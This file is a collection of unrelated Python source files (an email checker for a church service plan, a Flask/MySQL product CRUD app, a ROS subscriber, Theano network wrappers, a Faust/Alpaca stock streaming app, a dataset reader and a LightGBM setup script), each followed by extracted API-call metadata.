in tasks.get_task("model.dbt_test.model9").run_airflow_task.downstream_task_ids
)
|
[
"tests.utils.task_group_prefix_builder",
"os.path.abspath",
"tests.utils.test_dag"
] |
[((1328, 1338), 'tests.utils.test_dag', 'test_dag', ([], {}), '()\n', (1336, 1338), False, 'from tests.utils import task_group_prefix_builder, test_dag\n'), ((1624, 1667), 'tests.utils.task_group_prefix_builder', 'task_group_prefix_builder', (['"""model1"""', '"""test"""'], {}), "('model1', 'test')\n", (1649, 1667), False, 'from tests.utils import task_group_prefix_builder, test_dag\n'), ((1783, 1825), 'tests.utils.task_group_prefix_builder', 'task_group_prefix_builder', (['"""model1"""', '"""run"""'], {}), "('model1', 'run')\n", (1808, 1825), False, 'from tests.utils import task_group_prefix_builder, test_dag\n'), ((1941, 1984), 'tests.utils.task_group_prefix_builder', 'task_group_prefix_builder', (['"""model1"""', '"""test"""'], {}), "('model1', 'test')\n", (1966, 1984), False, 'from tests.utils import task_group_prefix_builder, test_dag\n'), ((401, 423), 'os.path.abspath', 'path.abspath', (['__file__'], {}), '(__file__)\n', (413, 423), False, 'from os import path\n'), ((661, 705), 'tests.utils.task_group_prefix_builder', 'task_group_prefix_builder', (['node_name', '"""test"""'], {}), "(node_name, 'test')\n", (686, 705), False, 'from tests.utils import task_group_prefix_builder, test_dag\n'), ((719, 762), 'tests.utils.task_group_prefix_builder', 'task_group_prefix_builder', (['node_name', '"""run"""'], {}), "(node_name, 'run')\n", (744, 762), False, 'from tests.utils import task_group_prefix_builder, test_dag\n'), ((1402, 1424), 'os.path.abspath', 'path.abspath', (['__file__'], {}), '(__file__)\n', (1414, 1424), False, 'from os import path\n')]
|
import os
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from gottesdienstplan import GoDiPlanChecker
MAIL_TEXT_TEMPLATE = """
Hallo,
im Gottesdienstplan scheint es einen Fehler, bzw. einen fehlenden Eintrag zu geben.
Bitte ergänze die fehlende Information oder korrigiere den falschen Eintrag.
Um was es sich genau handelt:
{message}
Liebe Grüße
Dein freundlicher Gottesdienstplan Checker
"""
MAIL_HTML_TEMPLATE = """
<p>Hallo,</p>
<p>
im Gottesdienstplan scheint es einen Fehler, bzw. einen fehlenden Eintrag zu geben.
Bitte ergänze die fehlende Information oder korrigiere den falschen Eintrag.
</p>
<p>
Um was es sich genau handelt:
</p>
<p><em>
{message}
</em></p>
<p>
<p>Liebe Grüße</p>
<p>Dein freundlicher Gottesdienstplan Checker</p>
"""
class Mailer:
def __init__(self, my_addr, port: int = 25):
self._server = None
self._my_addr = my_addr
self._port = port
def __enter__(self):
self._server = smtplib.SMTP("localhost", port=self._port)
return self
def __exit__(self, type, value, traceback):
self._server.quit()
self._server = None
def handle_check_report(self, data):
msg = data["message"]
recp = data["recipient"]
cc = f"webmaster@{MAIL_DOMAIN}"
mail = MIMEMultipart("alternative")
mail["Subject"] = "Gottesdienstplan Checker Nachricht"
mail["From"] = self._my_addr
mail["To"] = recp
mail["Cc"] = cc
mail.attach(MIMEText(MAIL_TEXT_TEMPLATE.format(message=msg), "plain"))
mail.attach(MIMEText(MAIL_HTML_TEMPLATE.format(message=msg), "html"))
self._server.send_message(
to_addrs=recp,
from_addr=self._my_addr,
msg=mail,
)
if __name__ == "__main__":
MAIL_DOMAIN = os.environ.get("MAIL_DOMAIN")
p = GoDiPlanChecker(mail_domain=MAIL_DOMAIN)
if MAIL_DOMAIN:
with Mailer(my_addr=f"godiplanchecker@{MAIL_DOMAIN}", port=25) as m:
p.check("1w", report=m.handle_check_report)
else:
p.check("1w", report=print)
|
[
"os.environ.get",
"email.mime.multipart.MIMEMultipart",
"smtplib.SMTP",
"gottesdienstplan.GoDiPlanChecker"
] |
[((1848, 1877), 'os.environ.get', 'os.environ.get', (['"""MAIL_DOMAIN"""'], {}), "('MAIL_DOMAIN')\n", (1862, 1877), False, 'import os\n'), ((1887, 1927), 'gottesdienstplan.GoDiPlanChecker', 'GoDiPlanChecker', ([], {'mail_domain': 'MAIL_DOMAIN'}), '(mail_domain=MAIL_DOMAIN)\n', (1902, 1927), False, 'from gottesdienstplan import GoDiPlanChecker\n'), ((1006, 1048), 'smtplib.SMTP', 'smtplib.SMTP', (['"""localhost"""'], {'port': 'self._port'}), "('localhost', port=self._port)\n", (1018, 1048), False, 'import smtplib\n'), ((1334, 1362), 'email.mime.multipart.MIMEMultipart', 'MIMEMultipart', (['"""alternative"""'], {}), "('alternative')\n", (1347, 1362), False, 'from email.mime.multipart import MIMEMultipart\n')]
|
#En este modulo se almacenan todas las rutas del proyecto
from flask import request, render_template, redirect, flash
from flask.views import MethodView #Este modulo importa la logica de la clase MethodView
from src.db import mysql
class IndexController(MethodView): #Heredo de methodview
def get(self):
with mysql.cursor() as cur:
cur.execute("SELECT * FROM products")
data = cur.fetchall() #Crea una tupla con todos los datos de la tabla, y los guardo en la variable data
cur.execute("SELECT * FROM categories")
categories = cur.fetchall()
return render_template('public/index.html', data=data, categories=categories)#renderiza el template html y le pasamos por parametro la variable data, donde se encuentran todos los datos de la tabla
def post(self):
code = request.form['code']
name = request.form['name']
stock = request.form['stock']
value = request.form['value']
category = request.form['category']
#Guardo los datos del formulario en la base de datos - tabla products
with mysql.cursor() as cur: #creo un alias a la sentencia mysql.cursor()
try:
cur.execute("INSERT INTO products VALUES(%s, %s, %s, %s, %s)", (code, name, stock, value, category)) #Inserto los valores del formulario a la tabla de la base de datos
cur.connection.commit() #Ejecucion de la sentencia
flash("El producto ha sido agregado correctamente", "success")
except:
flash("Un error ha ocurrido","error")
return redirect('/') #Retorno a la pagina principal - Index
class DeleteProductController(MethodView):
def post(self, code):
with mysql.cursor() as cur:
try:
cur.execute("DELETE FROM products WHERE code = %s", (code, ))
cur.connection.commit() # Ejecucion de la sentencia
flash("El producto ha sido eliminado correctamente", "success")
except:
flash("Un error ha ocurrido", "error")
return redirect('/') # Retorno a la pagina principal - Index
class UpdateProductController(MethodView):
def get(self, code):
with mysql.cursor() as cur:
cur.execute("SELECT * FROM products WHERE code = %s", (code, ))
product = cur.fetchone()#Recibe el primer dato que encuentre de acuerdo a la condicion sql
return render_template('public/update.html', product = product)
def post(self, code):
productCode = request.form['code']
name = request.form['name']
stock = request.form['stock']
value = request.form['value']
with mysql.cursor() as cur:
try:
cur.execute("UPDATE products SET code = %s, name = %s, stock = %s, value = %s WHERE code = %s", (productCode, name, stock, value, code))
cur.connection.commit()
flash("El producto ha sido actualizado correctamente", "success")
except:
flash("Un error ha ocurrido", "error")
return redirect('/')
class CreateCategoriesController(MethodView):
def get(self):
return render_template("public/categories.html")
def post(self):
id = request.form['id']
name = request.form['name']
description = request.form['description']
with mysql.cursor() as cur:
try:
cur.execute("INSERT INTO categories VALUES(%s, %s, %s)", (id, name, description))
cur.connection.commit()
flash("La categoria se ha creado!", "success")
except:
flash("Un error ha ocurrido", "error")
return redirect('/')
|
[
"src.db.mysql.cursor",
"flask.redirect",
"flask.flash",
"flask.render_template"
] |
[((3247, 3288), 'flask.render_template', 'render_template', (['"""public/categories.html"""'], {}), "('public/categories.html')\n", (3262, 3288), False, 'from flask import request, render_template, redirect, flash\n'), ((324, 338), 'src.db.mysql.cursor', 'mysql.cursor', ([], {}), '()\n', (336, 338), False, 'from src.db import mysql\n'), ((624, 694), 'flask.render_template', 'render_template', (['"""public/index.html"""'], {'data': 'data', 'categories': 'categories'}), "('public/index.html', data=data, categories=categories)\n", (639, 694), False, 'from flask import request, render_template, redirect, flash\n'), ((1121, 1135), 'src.db.mysql.cursor', 'mysql.cursor', ([], {}), '()\n', (1133, 1135), False, 'from src.db import mysql\n'), ((1629, 1642), 'flask.redirect', 'redirect', (['"""/"""'], {}), "('/')\n", (1637, 1642), False, 'from flask import request, render_template, redirect, flash\n'), ((1766, 1780), 'src.db.mysql.cursor', 'mysql.cursor', ([], {}), '()\n', (1778, 1780), False, 'from src.db import mysql\n'), ((2127, 2140), 'flask.redirect', 'redirect', (['"""/"""'], {}), "('/')\n", (2135, 2140), False, 'from flask import request, render_template, redirect, flash\n'), ((2269, 2283), 'src.db.mysql.cursor', 'mysql.cursor', ([], {}), '()\n', (2281, 2283), False, 'from src.db import mysql\n'), ((2490, 2544), 'flask.render_template', 'render_template', (['"""public/update.html"""'], {'product': 'product'}), "('public/update.html', product=product)\n", (2505, 2544), False, 'from flask import request, render_template, redirect, flash\n'), ((2743, 2757), 'src.db.mysql.cursor', 'mysql.cursor', ([], {}), '()\n', (2755, 2757), False, 'from src.db import mysql\n'), ((3152, 3165), 'flask.redirect', 'redirect', (['"""/"""'], {}), "('/')\n", (3160, 3165), False, 'from flask import request, render_template, redirect, flash\n'), ((3442, 3456), 'src.db.mysql.cursor', 'mysql.cursor', ([], {}), '()\n', (3454, 3456), False, 'from src.db import mysql\n'), ((3781, 3794), 'flask.redirect', 'redirect', (['"""/"""'], {}), "('/')\n", (3789, 3794), False, 'from flask import request, render_template, redirect, flash\n'), ((1473, 1535), 'flask.flash', 'flash', (['"""El producto ha sido agregado correctamente"""', '"""success"""'], {}), "('El producto ha sido agregado correctamente', 'success')\n", (1478, 1535), False, 'from flask import request, render_template, redirect, flash\n'), ((1969, 2032), 'flask.flash', 'flash', (['"""El producto ha sido eliminado correctamente"""', '"""success"""'], {}), "('El producto ha sido eliminado correctamente', 'success')\n", (1974, 2032), False, 'from flask import request, render_template, redirect, flash\n'), ((2992, 3057), 'flask.flash', 'flash', (['"""El producto ha sido actualizado correctamente"""', '"""success"""'], {}), "('El producto ha sido actualizado correctamente', 'success')\n", (2997, 3057), False, 'from flask import request, render_template, redirect, flash\n'), ((3640, 3686), 'flask.flash', 'flash', (['"""La categoria se ha creado!"""', '"""success"""'], {}), "('La categoria se ha creado!', 'success')\n", (3645, 3686), False, 'from flask import request, render_template, redirect, flash\n'), ((1572, 1610), 'flask.flash', 'flash', (['"""Un error ha ocurrido"""', '"""error"""'], {}), "('Un error ha ocurrido', 'error')\n", (1577, 1610), False, 'from flask import request, render_template, redirect, flash\n'), ((2069, 2107), 'flask.flash', 'flash', (['"""Un error ha ocurrido"""', '"""error"""'], {}), "('Un error ha ocurrido', 'error')\n", (2074, 2107), False, 'from flask import request, render_template, redirect, flash\n'), ((3094, 3132), 'flask.flash', 'flash', (['"""Un error ha ocurrido"""', '"""error"""'], {}), "('Un error ha ocurrido', 'error')\n", (3099, 3132), False, 'from flask import request, render_template, redirect, flash\n'), ((3723, 3761), 'flask.flash', 'flash', (['"""Un error ha ocurrido"""', '"""error"""'], {}), "('Un error ha ocurrido', 'error')\n", (3728, 3761), False, 'from flask import request, render_template, redirect, flash\n')]
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import rospy
from sample_py.msg import sample_message
def callback(msg):
rospy.loginfo("I heard: message = [%s], count = [%d]" % (msg.message, msg.count));
def subscriber():
rospy.init_node('sample_py_subscriber', anonymous=True)
rospy.Subscriber('sample_topic', sample_message, callback)
rospy.spin()
if __name__ == '__main__':
subscriber()
|
[
"rospy.loginfo",
"rospy.spin",
"rospy.Subscriber",
"rospy.init_node"
] |
[((122, 208), 'rospy.loginfo', 'rospy.loginfo', (["('I heard: message = [%s], count = [%d]' % (msg.message, msg.count))"], {}), "('I heard: message = [%s], count = [%d]' % (msg.message, msg.\n count))\n", (135, 208), False, 'import rospy\n'), ((229, 284), 'rospy.init_node', 'rospy.init_node', (['"""sample_py_subscriber"""'], {'anonymous': '(True)'}), "('sample_py_subscriber', anonymous=True)\n", (244, 284), False, 'import rospy\n'), ((290, 348), 'rospy.Subscriber', 'rospy.Subscriber', (['"""sample_topic"""', 'sample_message', 'callback'], {}), "('sample_topic', sample_message, callback)\n", (306, 348), False, 'import rospy\n'), ((354, 366), 'rospy.spin', 'rospy.spin', ([], {}), '()\n', (364, 366), False, 'import rospy\n')]
|
import numpy as np
import theano
import lasagne
## ALIASES ##
L = lasagne.layers
T = theano.tensor
get_output = L.get_output
get_all_params = L.get_all_params
cross_entropy = lasagne.objectives.categorical_crossentropy
get_layers = L.get_all_layers
class Network(object):
"""
Wrapper for neural networks for MNK that automates network compilation and
provides some conveninece functions for freezing, saving, and loading params
Things to consider doing:
mod save/load to use named layers
add self.reinitialize(layers)
"""
def __init__(self, architecture):
self.architecture = architecture
self.input_var = T.tensor4('inputs')
self.target_var = T.ivector('targets')
self.update_algo = lasagne.updates.adam # just a default
self.build()
self.objectives()
self.compile_functions()
self.val_trace = np.zeros(500)
self.train_trace = np.zeros(500)
self.trace_loc = 0
def build(self):
"""
Generates network graph, grabs params and output symbols
"""
self.net = self.architecture(self.input_var)
self.prediction = get_output(self.net)
self.test_prediction = get_output(self.net, deterministic=True)
self.params = get_all_params(self.net, trainable=True)
self.value_layer = get_layers(self.net)[-4]
self.value_prediction = get_output(self.value_layer)
return None
def objectives(self):
"""
Adds loss and accuracy nodes
"""
self.loss = cross_entropy(self.prediction, self.target_var)
self.loss = self.loss.mean()
self.itemized_loss = cross_entropy(self.test_prediction, self.target_var)
self.test_loss = self.itemized_loss.mean()
self.test_acc = T.mean(
T.eq(T.argmax(self.test_prediction, axis=1), self.target_var),
dtype=theano.config.floatX
)
self.updates = self.update_algo(self.loss, self.params)
return None
def compile_functions(self):
"""
Compiles theano functions for computing output, losses, etc
"""
self.output_fn = theano.function([self.input_var], self.test_prediction)
self.value_fn = theano.function([self.input_var], self.value_prediction)
self.train_fn = theano.function(
[self.input_var, self.target_var], self.loss,
updates=self.updates
)
self.test_fn = theano.function(
[self.input_var, self.target_var],
[self.test_loss, self.test_acc]
)
self.itemized_test_fn = theano.function(
[self.input_var, self.target_var],
self.itemized_loss
)
return None
def update_traces(self):
"""
Saves traces for plotting
"""
self.val_trace[self.trace_loc] = self.val_err
self.train_trace[self.trace_loc] = self.train_err
self.trace_loc += 1 # so hacky
return None
def freeze_params(self, net=None, exclude=None):
"""
Sets params to be untrainable
Excludes layers in optional arg exclude (tuple or list)
"""
if net is None:
net = self.net
layers = get_layers(net)
num_layers = len(layers)
exclude = [i if i >= 0 else num_layers + i for i in exclude]
if exclude is not None:
layers = [layer for l, layer in enumerate(layers) if not (l in exclude)]
for layer in layers:
for param in layer.params:
layer.params[param].remove('trainable')
self.params = get_all_params(net, trainable=True) # CAUTION: needs rewritten to not throw errors as autoencoders develop
return None
def unfreeze_params(self):
"""
Sets all parameters back to trainable
"""
for layer in L.get_all_layers(self.net):
for param in layer.params:
layer.params[param].add('trainable')
self.params = L.get_all_params(self.net, trainable=True)
return None
def save_params(self, param_file):
"""
Save parameters for reuse later
"""
all_params = L.get_all_param_values(self.net)
np.savez(param_file, *all_params)
return None
def load_params(self, paramsfile):
"""
Loads parameters from npz files
"""
with np.load(paramsfile) as loaded:
params_list = [(i[0], i[1]) for i in loaded.items()]
params_order = np.array([i[0][4:6] for i in params_list]).astype(int)
params_list = [params_list[i] for i in params_order.argsort()]
L.set_all_param_values(self.net, [i[1] for i in params_list])
return None
class Autoencoder(Network):
"""
Wrapper for training and testing transfer learning with an autoencoder.
Almost as cool as it sounds.
Later, use super() to cut down bloat inside functions
"""
def __init__(self, architecture):
self.architecture = architecture
self.input_var = T.tensor4('inputs')
self.target_var = T.ivector('targets')
self.ae_target_var = T.tensor4('ae inputs')
self.update_algo = lasagne.updates.adam
self.val_trace = []
self.train_trace = []
self.build()
self.objectives()
self.compile_functions()
def build(self):
"""Generates graph, caches params, output symbols"""
self.autoencoder, self.value_layer, self.net = self.architecture(self.input_var)
self.prediction = get_output(self.net)
self.test_prediction = get_output(self.net, deterministic=True)
self.value_prediction = get_output(self.value_layer)
self.image = get_output(self.autoencoder)
self.test_image = get_output(self.autoencoder, deterministic=True)
self.params = get_all_params(self.net)
self.ae_params = get_all_params(self.autoencoder)
return None
def objectives(self):
"""Loss functions, etc"""
self.loss = cross_entropy(self.prediction, self.target_var).mean()
self.itemized_test_loss = cross_entropy(self.test_prediction, self.target_var)
self.test_loss = self.itemized_test_loss.mean()
self.test_acc = T.mean(
T.eq(T.argmax(self.test_prediction, axis=1), self.target_var),
dtype=theano.config.floatX
)
self.updates = self.update_algo(self.loss, self.params)
self.ae_loss = T.mean((self.ae_target_var - self.image)**2, dtype=theano.config.floatX)
self.ae_test_loss = T.mean((self.ae_target_var - self.test_image)**2, dtype=theano.config.floatX)
self.ae_updates = self.update_algo(self.ae_loss, self.ae_params)
return None
def compile_functions(self):
"""Compile theano functions"""
self.output_fn = theano.function([self.input_var], self.test_prediction)
self.value_fn = theano.function([self.input_var], self.value_prediction)
self.train_fn = theano.function(
[self.input_var, self.target_var],
self.loss,
updates = self.updates
)
self.test_fn = theano.function(
[self.input_var, self.target_var],
[self.test_loss, self.test_acc]
)
self.itemized_test_fn = theano.function(
[self.input_var, self.target_var],
self.itemized_test_loss
)
self.ae_output_fn = theano.function([self.input_var], self.test_image)
self.ae_train_fn = theano.function(
[self.input_var, self.ae_target_var],
self.ae_loss,
updates=self.ae_updates
)
self.ae_test_fn = theano.function(
[self.input_var, self.ae_target_var],
self.ae_test_loss
)
return None
|
[
"numpy.load",
"theano.function",
"numpy.zeros",
"numpy.array",
"numpy.savez"
] |
[((904, 917), 'numpy.zeros', 'np.zeros', (['(500)'], {}), '(500)\n', (912, 917), True, 'import numpy as np\n'), ((945, 958), 'numpy.zeros', 'np.zeros', (['(500)'], {}), '(500)\n', (953, 958), True, 'import numpy as np\n'), ((2183, 2238), 'theano.function', 'theano.function', (['[self.input_var]', 'self.test_prediction'], {}), '([self.input_var], self.test_prediction)\n', (2198, 2238), False, 'import theano\n'), ((2263, 2319), 'theano.function', 'theano.function', (['[self.input_var]', 'self.value_prediction'], {}), '([self.input_var], self.value_prediction)\n', (2278, 2319), False, 'import theano\n'), ((2344, 2432), 'theano.function', 'theano.function', (['[self.input_var, self.target_var]', 'self.loss'], {'updates': 'self.updates'}), '([self.input_var, self.target_var], self.loss, updates=self.\n updates)\n', (2359, 2432), False, 'import theano\n'), ((2485, 2573), 'theano.function', 'theano.function', (['[self.input_var, self.target_var]', '[self.test_loss, self.test_acc]'], {}), '([self.input_var, self.target_var], [self.test_loss, self.\n test_acc])\n', (2500, 2573), False, 'import theano\n'), ((2635, 2705), 'theano.function', 'theano.function', (['[self.input_var, self.target_var]', 'self.itemized_loss'], {}), '([self.input_var, self.target_var], self.itemized_loss)\n', (2650, 2705), False, 'import theano\n'), ((4281, 4314), 'numpy.savez', 'np.savez', (['param_file', '*all_params'], {}), '(param_file, *all_params)\n', (4289, 4314), True, 'import numpy as np\n'), ((6921, 6976), 'theano.function', 'theano.function', (['[self.input_var]', 'self.test_prediction'], {}), '([self.input_var], self.test_prediction)\n', (6936, 6976), False, 'import theano\n'), ((7001, 7057), 'theano.function', 'theano.function', (['[self.input_var]', 'self.value_prediction'], {}), '([self.input_var], self.value_prediction)\n', (7016, 7057), False, 'import theano\n'), ((7082, 7170), 'theano.function', 'theano.function', (['[self.input_var, self.target_var]', 'self.loss'], {'updates': 'self.updates'}), '([self.input_var, self.target_var], self.loss, updates=self.\n updates)\n', (7097, 7170), False, 'import theano\n'), ((7238, 7326), 'theano.function', 'theano.function', (['[self.input_var, self.target_var]', '[self.test_loss, self.test_acc]'], {}), '([self.input_var, self.target_var], [self.test_loss, self.\n test_acc])\n', (7253, 7326), False, 'import theano\n'), ((7389, 7464), 'theano.function', 'theano.function', (['[self.input_var, self.target_var]', 'self.itemized_test_loss'], {}), '([self.input_var, self.target_var], self.itemized_test_loss)\n', (7404, 7464), False, 'import theano\n'), ((7528, 7578), 'theano.function', 'theano.function', (['[self.input_var]', 'self.test_image'], {}), '([self.input_var], self.test_image)\n', (7543, 7578), False, 'import theano\n'), ((7606, 7703), 'theano.function', 'theano.function', (['[self.input_var, self.ae_target_var]', 'self.ae_loss'], {'updates': 'self.ae_updates'}), '([self.input_var, self.ae_target_var], self.ae_loss, updates\n =self.ae_updates)\n', (7621, 7703), False, 'import theano\n'), ((7772, 7844), 'theano.function', 'theano.function', (['[self.input_var, self.ae_target_var]', 'self.ae_test_loss'], {}), '([self.input_var, self.ae_target_var], self.ae_test_loss)\n', (7787, 7844), False, 'import theano\n'), ((4452, 4471), 'numpy.load', 'np.load', (['paramsfile'], {}), '(paramsfile)\n', (4459, 4471), True, 'import numpy as np\n'), ((4575, 4617), 'numpy.array', 'np.array', (['[i[0][4:6] for i in params_list]'], {}), '([i[0][4:6] for i in params_list])\n', (4583, 4617), True, 'import numpy as np\n')]
|
import logging
import os
from datetime import timedelta
import alpaca_trade_api
import faust
from alpaca_trade_api.common import URL
from faust import Worker
app = faust.App(
'stock-app',
broker='kafka://localhost:9092',
value_serializer='json',
store='rocksdb://',
version=1,
)
ALPACA_BASE_URL = URL('https://paper-api.alpaca.markets')
alpaca_ws_url = URL('wss://data.alpaca.markets')
ALPACA_API_KEY = os.getenv('alpaca_key_id')
ALPACA_SECRET_KEY = os.getenv('alpaca_secret_key')
alpaca = alpaca_trade_api.REST(ALPACA_API_KEY, ALPACA_SECRET_KEY, ALPACA_BASE_URL, api_version='v2')
class OHLCRecord(faust.Record, serializer='json'):
Name: str
datetime: str
Open: float
High: float
Low: float
Close: float
Volume: float
stock_market_topic = app.topic('stockmarket-topic', key_type=OHLCRecord, value_type=OHLCRecord, partitions=2)
stock_market_table = app.Table(name='stockmarket-table', default=float, partitions=10).tumbling(
size=timedelta(seconds=10), expires=timedelta(seconds=60))
stock_order_topic = app.topic('stock-order-topic', key_type=str, value_type=str, partitions=10)
@app.timer(interval=1)
async def get_ohlc():
FAANG_STOCKS = ['FB', 'AMZN', 'APPL', 'NFLX', 'GOOG']
df = alpaca.get_latest_bars(symbols=FAANG_STOCKS)
for name, bar in df.items():
record = OHLCRecord(
Name=name,
datetime=bar.t,
Open=bar.o,
Close=bar.c,
High=bar.h,
Low=bar.l,
Volume=bar.v
)
# logging.info(record)
await stock_market_topic.send(key=record, value=record)
@app.timer(interval=10)
async def back_test():
key = 'stock_name'
action = 'buy'
await stock_order_topic.send(key=key, value=action)
@app.agent(stock_order_topic, concurrency=10, isolated_partitions=False)
async def handle_order(orders):
async for key, order in orders.items():
logging.info(f'Send Order {key} to {order}')
if __name__ == '__main__':
worker = Worker(app=app, loglevel=logging.INFO)
worker.execute_from_commandline()
|
[
"alpaca_trade_api.REST",
"alpaca_trade_api.common.URL",
"logging.info",
"datetime.timedelta",
"faust.Worker",
"os.getenv",
"faust.App"
] |
[((166, 282), 'faust.App', 'faust.App', (['"""stock-app"""'], {'broker': '"""kafka://localhost:9092"""', 'value_serializer': '"""json"""', 'store': '"""rocksdb://"""', 'version': '(1)'}), "('stock-app', broker='kafka://localhost:9092', value_serializer=\n 'json', store='rocksdb://', version=1)\n", (175, 282), False, 'import faust\n'), ((320, 359), 'alpaca_trade_api.common.URL', 'URL', (['"""https://paper-api.alpaca.markets"""'], {}), "('https://paper-api.alpaca.markets')\n", (323, 359), False, 'from alpaca_trade_api.common import URL\n'), ((376, 408), 'alpaca_trade_api.common.URL', 'URL', (['"""wss://data.alpaca.markets"""'], {}), "('wss://data.alpaca.markets')\n", (379, 408), False, 'from alpaca_trade_api.common import URL\n'), ((426, 452), 'os.getenv', 'os.getenv', (['"""alpaca_key_id"""'], {}), "('alpaca_key_id')\n", (435, 452), False, 'import os\n'), ((473, 503), 'os.getenv', 'os.getenv', (['"""alpaca_secret_key"""'], {}), "('alpaca_secret_key')\n", (482, 503), False, 'import os\n'), ((514, 609), 'alpaca_trade_api.REST', 'alpaca_trade_api.REST', (['ALPACA_API_KEY', 'ALPACA_SECRET_KEY', 'ALPACA_BASE_URL'], {'api_version': '"""v2"""'}), "(ALPACA_API_KEY, ALPACA_SECRET_KEY, ALPACA_BASE_URL,\n api_version='v2')\n", (535, 609), False, 'import alpaca_trade_api\n'), ((2035, 2073), 'faust.Worker', 'Worker', ([], {'app': 'app', 'loglevel': 'logging.INFO'}), '(app=app, loglevel=logging.INFO)\n', (2041, 2073), False, 'from faust import Worker\n'), ((992, 1013), 'datetime.timedelta', 'timedelta', ([], {'seconds': '(10)'}), '(seconds=10)\n', (1001, 1013), False, 'from datetime import timedelta\n'), ((1023, 1044), 'datetime.timedelta', 'timedelta', ([], {'seconds': '(60)'}), '(seconds=60)\n', (1032, 1044), False, 'from datetime import timedelta\n'), ((1948, 1992), 'logging.info', 'logging.info', (['f"""Send Order {key} to {order}"""'], {}), "(f'Send Order {key} to {order}')\n", (1960, 1992), False, 'import logging\n')]
|
# Copyright 2019 Graphcore Ltd.
"""
Dataset reader from Datalogue keras-attention tutorial.
References:
https://github.com/datalogue/keras-attention
https://medium.com/datalogue
"""
import json
import csv
import random
import numpy as np
# from keras.utils.np_utils import to_categorical
INPUT_PADDING = 50
OUTPUT_PADDING = 100
class Vocabulary(object):
def __init__(self, vocabulary_file, padding=None):
"""
Creates a vocabulary from a file
:param vocabulary_file: the path to the vocabulary
"""
self.vocabulary_file = vocabulary_file
with open(vocabulary_file, 'r') as f:
self.vocabulary = json.load(f)
self.padding = padding
self.reverse_vocabulary = {v: k for k, v in self.vocabulary.items()}
def start_id(self):
return self.vocabulary['<sot>']
def end_id(self):
return self.vocabulary['<eot>']
def size(self):
"""
Gets the size of the vocabulary
"""
return len(self.vocabulary.keys())
def string_to_int(self, text):
"""
Converts a string into it's character integer
representation
:param text: text to convert
"""
characters = list(text)
integers = []
if self.padding and len(characters) >= self.padding:
# truncate if too long
characters = characters[:self.padding-1]
characters.append('<eot>')
for c in characters:
if c in self.vocabulary:
integers.append(self.vocabulary[c])
else:
integers.append(self.vocabulary['<unk>'])
# pad:
if self.padding and len(integers) < self.padding:
integers.extend(
[self.vocabulary['<unk>']] * (self.padding - len(integers))
)
if len(integers) != self.padding:
print(text)
raise AttributeError('Length of text was not padding.')
return integers
def int_to_string(self, integers):
"""
Decodes a list of integers
into it's string representation
"""
characters = []
for i in integers:
characters.append(self.reverse_vocabulary[i])
return characters
class Data(object):
def __init__(self, file_name, input_vocabulary, output_vocabulary):
"""
Creates an object that gets data from a file
:param file_name: name of the file to read from
:param vocabulary: the Vocabulary object to use
:param batch_size: the number of datapoints to return
:param padding: the amount of padding to apply to
a short string
"""
self.input_vocabulary = input_vocabulary
self.output_vocabulary = output_vocabulary
self.file_name = file_name
def load(self):
"""
Loads data from a file
"""
self.inputs = []
self.targets = []
with open(self.file_name, 'r') as f:
reader = csv.reader(f)
for row in reader:
self.inputs.append(row[0])
self.targets.append(row[1])
def transform(self):
"""
Transforms the data as necessary
"""
# @TODO: use `pool.map_async` here?
self.inputs = np.array(list(
map(self.input_vocabulary.string_to_int, self.inputs)))
self.targets = np.array(list(
map(self.output_vocabulary.string_to_int, self.targets)))
assert len(self.inputs.shape) == 2, 'Inputs could not properly be encoded'
assert len(self.targets.shape) == 2, 'Targets could not properly be encoded'
def generator(self, batch_size):
"""
Creates a generator that can be used in `model.fit_generator()`
Batches are generated randomly.
:param batch_size: the number of instances to include per batch
"""
instance_id = range(len(self.inputs))
while True:
try:
batch_ids = random.sample(instance_id, batch_size)
yield (np.array(self.inputs[batch_ids], dtype=int),
np.array(self.targets[batch_ids]))
except Exception as e:
print('EXCEPTION OMG')
print(e)
yield None, None
if __name__ == '__main__':
input_vocab = Vocabulary('../data/human_vocab.json', padding=50)
output_vocab = Vocabulary('../data/machine_vocab.json', padding=12)
ds = Data('../data/fake.csv', input_vocab, output_vocab)
ds.load()
ds.transform()
print(ds.inputs.shape)
print(ds.targets.shape)
g = ds.generator(32)
print(ds.inputs[[5, 10, 12]].shape)
print(ds.targets[[5, 10, 12]].shape)
|
[
"random.sample",
"json.load",
"csv.reader",
"numpy.array"
] |
[((683, 695), 'json.load', 'json.load', (['f'], {}), '(f)\n', (692, 695), False, 'import json\n'), ((3124, 3137), 'csv.reader', 'csv.reader', (['f'], {}), '(f)\n', (3134, 3137), False, 'import csv\n'), ((4146, 4184), 'random.sample', 'random.sample', (['instance_id', 'batch_size'], {}), '(instance_id, batch_size)\n', (4159, 4184), False, 'import random\n'), ((4208, 4251), 'numpy.array', 'np.array', (['self.inputs[batch_ids]'], {'dtype': 'int'}), '(self.inputs[batch_ids], dtype=int)\n', (4216, 4251), True, 'import numpy as np\n'), ((4276, 4309), 'numpy.array', 'np.array', (['self.targets[batch_ids]'], {}), '(self.targets[batch_ids])\n', (4284, 4309), True, 'import numpy as np\n')]
|
# coding: utf-8
# pylint: disable=invalid-name, exec-used
"""Setup lightgbm package."""
from __future__ import absolute_import
import os
import sys
from setuptools import find_packages, setup
sys.path.insert(0, '.')
CURRENT_DIR = os.path.dirname(__file__)
libpath_py = os.path.join(CURRENT_DIR, 'lightgbm/libpath.py')
libpath = {'__file__': libpath_py}
exec(compile(open(libpath_py, "rb").read(), libpath_py, 'exec'), libpath, libpath)
LIB_PATH = [os.path.relpath(path, CURRENT_DIR) for path in libpath['find_lib_path']()]
print("Install lib_lightgbm from: %s" % LIB_PATH)
setup(name='lightgbm',
version=0.2,
description="LightGBM Python Package",
install_requires=[
'numpy',
'scipy',
],
maintainer='<NAME>',
maintainer_email='<EMAIL>',
zip_safe=False,
packages=find_packages(),
include_package_data=True,
data_files=[('lightgbm', LIB_PATH)],
url='https://github.com/Microsoft/LightGBM')
|
[
"os.path.dirname",
"sys.path.insert",
"os.path.relpath",
"os.path.join",
"setuptools.find_packages"
] |
